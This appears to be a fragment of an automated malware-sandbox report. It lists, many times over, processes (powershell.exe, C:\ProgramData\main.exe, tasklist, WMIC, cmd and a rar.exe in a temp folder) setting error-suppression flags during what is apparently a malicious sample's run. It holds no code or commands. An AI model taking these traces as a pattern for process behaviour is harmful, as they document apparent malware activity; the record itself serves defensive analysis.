                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
